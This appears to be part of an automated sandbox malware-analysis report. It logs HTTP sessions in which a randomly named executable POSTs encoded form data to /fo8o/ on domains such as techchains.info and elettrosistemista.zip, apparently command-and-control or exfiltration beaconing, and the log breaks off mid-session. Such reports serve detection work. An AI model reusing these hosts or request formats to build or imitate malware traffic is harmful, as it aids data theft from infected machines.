                                                                                  Data Ascii: iner-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:9%}.container-content__container-ads{margin-top:8%}.cont
                                                                                  Jan 15, 2025 08:30:44.635185957 CET1236INData Raw: 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b
                                                                                  Data Ascii: er-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-element-link:focus{te
                                                                                  Jan 15, 2025 08:30:44.635198116 CET1236INData Raw: 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 73 65 61 72 63 68
                                                                                  Data Ascii: ine-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox__input,.container-searchbox__button{border:0 none}.container-searchbox__button{cursor:pointer;font-size:12px;margin-
                                                                                  Jan 15, 2025 08:30:44.635207891 CET672INData Raw: 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 35 25 3b 6d 61
                                                                                  Data Ascii: content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-message__content-interactive{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message__content-interactive-header,
                                                                                  Jan 15, 2025 08:30:44.635217905 CET1236INData Raw: 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f
                                                                                  Data Ascii: on:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:i
                                                                                  Jan 15, 2025 08:30:44.635230064 CET1236INData Raw: 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63
                                                                                  Data Ascii: -size:medium}.btn--secondary:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-colo
                                                                                  Jan 15, 2025 08:30:44.640238047 CET1236INData Raw: 6e 67 2d 72 69 67 68 74 3a 35 25 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 7d 0a 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20
                                                                                  Data Ascii: ng-right:5%;padding-bottom:10px} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"singleDomainName":"rssnewscast.com","domainName":"rssnewscast.com","domainPrice":0,"domainCurrency":"","adultFlag":false,"pu":


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.64991766.29.149.46803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:30:57.960477114 CET790OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.techchains.info
                                                                                  Origin: http://www.techchains.info
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 213
                                                                                  Referer: http://www.techchains.info/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 70 6e 47 58 38 4c 33 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 74 71 7a 62 69 56 74 64 67 41 4d 61 68 6b 63 31 58 46 58 6a 46 4e 53 73 7a 55 6d 75 62 7a 39 48 6b 53 50 39 73 4e 6b 41 59 54 57
                                                                                  Data Ascii: pnGX8L3p=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXItqzbiVtdgAMahkc1XFXjFNSszUmubz9HkSP9sNkAYTW
                                                                                  Jan 15, 2025 08:30:58.598176003 CET637INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 15 Jan 2025 07:30:58 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.64991866.29.149.46803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:31:00.500895977 CET814OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.techchains.info
                                                                                  Origin: http://www.techchains.info
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 237
                                                                                  Referer: http://www.techchains.info/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 70 6e 47 58 38 4c 33 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 74 51 73 78 4d 55 75 37 7a 58 46 6b 71 50 76 37 42 44 50 73 32 31 61 64 53 4f 32 35 32 66 72 47 63 45 4c 57 46 53 66 35 61 59 71 77 3d 3d
                                                                                  Data Ascii: pnGX8L3p=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVtQsxMUu7zXFkqPv7BDPs21adSO252frGcELWFSf5aYqw==
                                                                                  Jan 15, 2025 08:31:01.115585089 CET637INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 15 Jan 2025 07:31:01 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.64991966.29.149.46803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:31:03.034581900 CET1827OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.techchains.info
                                                                                  Origin: http://www.techchains.info
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1249
                                                                                  Referer: http://www.techchains.info/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 70 6e 47 58 38 4c 33 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 59 57 44 7a 38 46 78 30 5a 31 79 31 4d 79 36 68 4d 2f 74 4e 50 62 42 6b 57 4b 67 36 6b 30 57 39 43 68 53 39 58 52 2b 37 33 2f 71 56 59 78 49 79 30 52 52 4d 7a 73 32 41 2b 4f 70 6a 76 75 49 4d 42 4c 6f 72 56 6b 36 6f 46 50 36 58 70 72 6d 36 76 4c 47 41 37 30 34 44 55 69 68 38 49 33 67 74 6f 6b 32 42 34 6b 32 2b 74 4d 6e 77 59 73 75 2b 63 50 71 48 46 67 57 37 55 4a 4c 63 46 50 73 32 4a 52 65 73 48 2f 41 6f 64 63 65 67 61 43 4e 37 68 68 6f 75 43 35 5a 70 4a 45 73 48 45 69 58 [TRUNCATED]
                                                                                  Data Ascii: pnGX8L3p=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNnYWDz8Fx0Z1y1My6hM/tNPbBkWKg6k0W9ChS9XR+73/qVYxIy0RRMzs2A+OpjvuIMBLorVk6oFP6Xprm6vLGA704DUih8I3gtok2B4k2+tMnwYsu+cPqHFgW7UJLcFPs2JResH/AodcegaCN7hhouC5ZpJEsHEiX7cgW7zuI60JeSi7X7an0pH15nEFNZASgOVRwKFkrNaE1wyZPPVcoETqEHFkiwQyoFxywvqC0x98C7vphzvMl4UgECr9egoFU931MrywlRSAvRkl0e8P11lRLj7GV76LpQF0Pibup/5EyCNfcqy3KyNvNQlrDySsuHSTnzn35//5EHg1Id9+xzb3N84ccRPci1sr11Sz1pxot0S1pzvIHPROmGpe/8E0AaJDSwmVzRef/T9hjapGA6qGEEDpeKNE5ez26JQFhPh5i9e+fT3yM9O8mqm12VMElzf+AfzUE530juFIlx6+dECOKyNlB2PpiPuOQi6iQXCgjxsCMuQyXyVkr33be3+V8yLwPjwsZ289Nr/FmWE4+zL/YgH9bJtGFY0u0sdyjWxeNX8j8mvAVJ97iJRUthMq3ithoqoWSmVpgo9LFAiXV+3ATFfTUp3M/ORdIL9W5HMEMYRQdrBC4xm7TOamhSpoJEOTq0vwLGb6ca/n8JXcuO0IG5Q6M4u4aa46BD16QyGPHviBQfNYSnFlpqI45i3PHCfdSuQdg89HWvbTyICgg/Zx6i5NjktnT7vfwIJ4eVtFbR6uYzM2Ytvr74YSLms1pfePUvoLxo0pFFKtcZXCBBCKQHqbVOEjBevjoA8SSOXD4v/RgXxjFG4JN1IW4EJ+TWb [TRUNCATED]
                                                                                  Jan 15, 2025 08:31:03.651276112 CET637INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 15 Jan 2025 07:31:03 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.64992066.29.149.46803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:31:05.565576077 CET533OUTGET /fo8o/?pnGX8L3p=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5haoQH1WjEWithRFLxLKOV4ce9fWCCnKIVX4jHNmrNLQZpWctVBLU=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.techchains.info
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Jan 15, 2025 08:31:06.171173096 CET652INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 15 Jan 2025 07:31:06 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.649921195.110.124.133803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:31:11.292511940 CET808OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Origin: http://www.elettrosistemista.zip
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 213
                                                                                  Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 70 6e 47 58 38 4c 33 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 69 31 55 77 34 49 32 58 75 43 48 37 6d 35 73 61 4e 51 5a 43 68 4c 45 2b 49 67 42 52 2f 6d 6a 2f 4a 7a 78 62 66 34 49 6f 66 65 4f
                                                                                  Data Ascii: pnGX8L3p=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCii1Uw4I2XuCH7m5saNQZChLE+IgBR/mj/Jzxbf4IofeO
                                                                                  Jan 15, 2025 08:31:11.957542896 CET367INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 15 Jan 2025 07:31:11 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.649922195.110.124.133803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:31:13.841084957 CET832OUTPOST /fo8o/ HTTP/1.1
